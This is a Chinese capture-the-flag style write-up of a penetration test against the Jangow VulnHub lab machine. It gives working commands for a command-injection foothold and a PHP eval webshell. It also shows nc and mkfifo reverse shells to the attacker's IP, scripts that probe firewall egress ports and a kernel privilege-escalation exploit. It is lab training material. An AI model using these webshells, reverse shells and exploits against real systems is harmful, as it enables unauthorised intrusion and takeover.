Write-Up - [渗透测试] jangow靶机渗透测试

Author:一条’小龍龙

Team:Traceless 网络安全团队

Data:2023/9/14

Description:Bob靶机渗透测试

靶场环境

官方:Jangow: 1.0.1 ~ VulnHub

Write-Up

step 1 信息收集

确定当前本机IP

请添加图片描述

扫描当前网段内所有主机的存活状态

在这里插入图片描述

得知 192.168.3.26 为靶机IP(我这里是桥接的,其他IP为内网其他设备)

深度扫描 获取更加详细的信息

在这里插入图片描述

发现开放了2180端口

访问80端口,发现是一个目录遍历

在这里插入图片描述

进入site目录则是网站根目录

在这里插入图片描述

页面是由Bootstrap框架搭建的

看一下robots.txt是否存在 发现均不存在

在这里插入图片描述

在这里插入图片描述

step 2 命令执行写入webshell

正常点击导航栏链接,看看都是什么页面,是否有可以利用的地方

经测试,发现导航栏中Busque二级页面命令执行漏洞

在这里插入图片描述

执行成功

查看/etc/passwd文件中具有shell执行权限的用户

cat /etc/passwd | grep /bin/bash

在这里插入图片描述

继续搜集相关信息

在这里插入图片描述

在这里插入图片描述

发现一个 .backup 隐藏文件 话不多说 必须看啊!

在这里插入图片描述

OK! 是一个连接MySQL的PHP文件 里面有数据库的账号和密码

我们发现该数据库账号和我们之前看到的用户名是同一个,那密码呢?试!

在这里插入图片描述

输入账号密码后连接成功

在这里插入图片描述

在site目录下上传一句话木马

<?php eval($_REQUEST[8]);?>

上传失败 在web端写入吧

echo '<?php eval($_REQUEST[8]);?>' > shell.php

请添加图片描述

在这里插入图片描述

在这里插入图片描述

成功写入 访问成功

在这里插入图片描述

webshell 蚁剑连接成功

step 3 反弹shell

本机使用nc监听 9001端口

nc64 -lvvp 9001

在这里插入图片描述

webshell终端 向攻击机反弹shell

nc -e /bin/bash 192.168.3.27 9001

在这里插入图片描述

发现没有-e参数,那就使用其他命令反弹shell (这样的命令有很多,有兴趣的朋友可以访问这个网址https://forum.ywhack.com/reverse-shell)

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.3.27 9001 >/tmp/f

经测试,发现没反应 怀疑是防火墙被设置了端口相关策略导致的

攻击机本地写脚本1.bat如下(由于从端口1-65535依次遍历并向1000端口转发,所需时间会很长,由于是WP,这里我直接到1000就截止了,大家知道就好):

@echo off
:loop
	set /a a+=1	
	netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=%a% connectaddress=127.0.0.1 connectport=1000
	echo port %a% to 1000 OK !
	if %a% == 1001 (
		exit
	)
goto loop
pause

右键该 1.bat 文件,选择管理员运行即可。

在这里插入图片描述

脚本运行完毕会自动关闭,此时,我们使用nc监听1000端口

在这里插入图片描述

在webshell终端内新建1.sh文件

在这里插入图片描述

内容如下:

for i in {1..65535};
do
    nc -w 1 -vz 192.168.3.27 $i && echo "$i open" >> res.txt || echo "$iclosed" >> res.txt
done

保存后,打开终端输入以下命令执行脚本

chmod +x 1.sh
bash 1.sh

在这里插入图片描述

攻击机端有了反应 我们去webshell中查看res.txt文件中哪个端口是open

在这里插入图片描述

发现是443端口

在反弹shell之前,我们在攻击机上先把端口重定向给复原了

cmd管理员下输入netsh interface portproxy reset(注意这条指令是重置的意思)

在这里插入图片描述

攻击机端开启443的端口监听

在这里插入图片描述

靶机反弹shell

在这里插入图片描述

在这里插入图片描述

建立连接成功

python -c "import pty;pty.spawn('/bin/bash')"

在这里插入图片描述

遇到了点小问题,说是找不到python。不过用whereis知道了python的路径,最后还是创建了交互式的shell

在这里插入图片描述

在这里插入图片描述

在用户jangow家目录下找到了user.txt文件 看着像是md5,拿去解密试试

在这里插入图片描述

空密码 …

好吧!,继续搞,我们的目的是拿到root权限 OK! 提权!

step 3 漏洞利用

查看系统版本信息

在这里插入图片描述

系统版本为 Ubuntu 4.4.0

在线搜集相关版本漏洞

在这里插入图片描述

下载后,上传至site目录下

在这里插入图片描述

step 4 提权

运行该exp

gcc 45010.c

此时会生成a.out文件,运行该文件即可获取root权限

在这里插入图片描述

OK ! root权限拿到了 现在我们去root用户家目录看看有什么好东西 ~

在这里插入图片描述

找到了一个名为 proof.txt 的文件,打开后里面的文件内容就是这次的flag

在这里插入图片描述

  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

一条小龍龙

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值